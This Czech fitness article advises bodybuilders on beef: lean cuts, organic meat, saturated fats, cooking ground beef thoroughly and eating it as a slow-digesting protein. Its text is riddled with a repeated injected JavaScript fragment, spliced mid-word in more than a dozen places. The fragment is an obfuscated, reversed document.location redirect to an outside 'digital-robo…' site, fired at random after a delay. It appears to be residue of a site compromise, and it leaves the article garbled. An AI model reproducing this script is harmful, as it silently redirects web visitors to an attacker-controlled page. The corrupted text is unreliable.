Výživa

KDE VĚZÍ HOVĚZÍ?

Jaké místobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to zaujímá červené maso v jídelníčku kulturistů?

Hovězí maso coby vysoce kvalitní zdroj bílkovin vám umožní ještě výraznější nárůst svalové hmoty, stačí jen dodržet následující pravidla ohledně výběru, přípravy a konzumace.

 

Bez ohledu na negativní názory, kterých se kolem hovězího masa v posledních dekádách nahromadilo víc než dost, platí, že když dodržujete určitá pravidla, je tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tohle maso excelentní potravinou nejenom pro sportobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tovce. Představuje cestu k růstu svalové hmoty. Klíčem k úspěchu je vědět, které kousky masa si vybrat a jak je správně připravit.

 

  1. VYBÍREJTE SI LIBOVÉ KOUSKY

Ne všechny krávy jsou stejné – nebo alespoň ne všechny části jejich těla. Některé kousky hovězího jsou libovější než jiné. A většina kulturistů podle tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toho určuje, jakému masu dát přednost. Kvalita zde vítězí nad cenou. 250 g libového svíčkové nebo kýty má pouze 11-13 gramů tuku (4-5 g nasycených tuků), zatímco stejně velká porce žebírka obsahuje až 79 gramů tuku (23 g nasycených) a obsah kalorií vzroste ze 437 na 935.

KUPUJTE, POKUD MOŽNO, BIO HOVĚZÍ MASO

Nezáleží ale pouze na tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tom, jaký kousek masa zvolíte. klíčovou roli sehraje také, v jakých podmínkách byly krávy chované a čím je krmili. Jednou z největších výhod bio hovězího masa je výrazně lepší lipidový profil. Obsahuje více CLA a omega-3 mastných kyselin. Navíc je zcela prosté syntetických hormonů, antibiotik, herbicidů a pesticidů.

Bio hovězí maso je většinou dražší než klasické hovězí ze skotu chovaného v kravínech. Většina sportobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tovců vám ale potvrdí, že ten cenový rozdíl rozhodně stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tojí za tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to – ať už z pohledu zdravotního nebo co se týče vlivu na nárůst svalové hmoty.

NEBOJTE SE NASYCENÝCH TUKŮ

Kulturisté obvykle velice pečlivě sledují příjem nasycených tuků. Do určité míry tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to má zcela svoje opodstatnění, ale současně platí, že nasycené tuky jsou pro tělo v rozumných dávkách přínosem. Jsou klíčovým komponentem při produkci hormonů, například testobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tosteronu. Pokud vaše strava obsahuje jen velmi málo nasycených tuků, můžete tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to nepříznivě ovlivnit hladinu testobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tosteronu.

Obecně platí, že by kulturisté měli asi polovinu kalorií ve formě tuků čerpat ze zdravých tuků. Jejich zdrojem je například olivový a kanolový olej, ořechy, semínka, avokádo a tučně ryby, např. losos. Druhá polovina dávky tuků by měla pocházet z nasycených zdrojů, jako jsou mléčné produkty, vajíčka a maso. Kulturisté (a nejenom oni) by se měli vyhýbat trans tukům (chemicky změněným hydrogenovaným olejům).

MLETÉ MASO TEPELNĚ UPRAVUJTE PEČLIVĚJI NEŽ STEAKY

Z hlediska případné kontaminace je mleté hovězí nejrizikovější. Doba jeho tepelné úpravy by tedy měla být dostatečně dlouhá. Mleté maso byste měli připravovat pouze na stupeň medium a výš. Když takový karbanátek nebo hamburger rozkrojíte, nemělo by být maso uvnitř vůbec růžové.

 

VYUŽIJTE HOVĚZÍ MASO JAKO POMALU STRAVITELNÝ ZDROJ BÍLKOVIN

Zkušení kulturisté vědí, v čem spočívají výhody konzumace rychle a pomalu stravitelných bílkovin v různou denní dobu, v závislosti na okamžitých potřebách organismu. Rychle stravitelné proteiny (například syrovátka a sojové bílkoviny) jsou excelentní v okamžiku, kdy máte za sebou dlouhou dobu bez příjmu bílkovin, tzn. například po probuzení nebo, když chcete po tréninku nastartobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tovat regeneraci.

Pomalu stravitelné formy bílkovin přichází ke slovu během dne, kdy potřebujete mít k dispozici stabilní dávku aminokyselin. Hovězí maso je jedním z nejlepších zdrojů pomalu stravitelných bílkovin. Hodí se protobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to i pro konzumaci večer před spaním, asi 90 minut po tréninku. Takový postup umožní dosáhnout pomalého uvolňování aminokyselin v průběhu noci, čímž se snižuje riziko rozkladu svalové tkáně.